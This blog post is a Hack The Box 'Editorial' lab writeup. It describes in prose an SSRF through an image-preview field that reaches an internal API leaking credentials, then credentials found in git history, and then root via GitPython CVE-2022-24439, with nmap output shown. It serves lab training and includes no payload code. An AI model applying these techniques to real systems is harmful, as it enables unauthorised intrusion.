• Home
  • Posts
  • Categories
  • GitHub
  • Email
© 2025 sk8thing.dev

Hack The Box - Editorial writeup

22 October 2024
2 min read
CTF WriteupHack The BoxMachineLinux

Nmap scan

...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMApl7gtas1JLYVJ1BwP3Kpc6oXk6sp2JyCHM37ULGN+DRZ4kw2BBqO/yozkui+j1Yma1wnYsxv0oVYhjGeJavM=
|   256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXtxiT4ZZTGZX4222Zer7f/kAWwdCWM/rGzRrGVZhYx
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...

Only two open ports: 22 SSH and 80 HTTP, most likely that the initial foothold will be achieved by exploiting a web vulnerability.

Port 80

Upon visiting the website hosted on port 80, I noticed the Publish with Us page that had a file upload feature. I attempted to upload a PHP reverse shell, however, after opening the image preview, I found that the file had been renamed and its extension was stripped.

HTB Editorial reverse shell preview

HTB Editorial reverse shell preview

HTB Editorial reverse shell attempt

HTB Editorial reverse shell attempt

HTB Editorial reverse shell renamed

HTB Editorial reverse shell renamed

Next, I decided to intercept the preview request using Burp Suite to understand what was going on. I attempted to redirect the upload to my own machine, setting up a Python HTTP server to receive the image.

HTB Editorial HTTP server upload

HTB Editorial HTTP server upload

Uploading the image to http://localhost:80 returned the default preview icon. The web app was trying to fetch the image, but it couldn’t access it, resulting in the fallback to the default icon.

HTB Editorial localhost upload

HTB Editorial localhost upload

This made me think there's another app running on a internal port, so I starter scanning using Burp Suite's Turbo Intruder.

HTB Editorial turbo intruder

HTB Editorial turbo intruder

As I suspected, internal port 5000 is open and returns a file.

HTB Editorial internal port 5000

HTB Editorial internal port 5000

I downloaded the file, and it contained information about the available API endpoints.

{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

/api/latest/metadata/messages/authors was particularly useful, since it contained some credentials.

Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.

Your login credentials for our internal forum and authors site are:
Username: <redacted>
Password: <redacted>
Please be sure to change your password as soon as possible for security purposes.
Don't hesitate to reach out if you have any questions or ideas - we're always here to support you.

Best regards, Editorial Tiempo Arriba Team.

User flag

I just logged into the machine with the credentials using SSH and claimed the user flag.

HTB Editorial user flag

HTB Editorial user flag

Root flag

I explored the /apps directory and discovered a .git repository, so I began looking for any clues that could potentially lead to privilege escalation. Finally I found some credentials for prod user.

HTB Editorial prod credentials

HTB Editorial prod credentials

I logged into the prod user, and things immediately looked promising: the user has limited sudo privileges.

HTB Editorial sudo priviledges

HTB Editorial sudo priviledges

At this point I hit a rabbit hole, spending a huge amount of time trying to exploit the script to gain root privileges, but without success. While reviewing the installed package versions, I discovered that GitPython 3.1.29 is installed, which is vulnerable to CVE-2022-24439. This vulnerability finally allowed me to claim the root flag.

HTB Editorial root flag

HTB Editorial root flag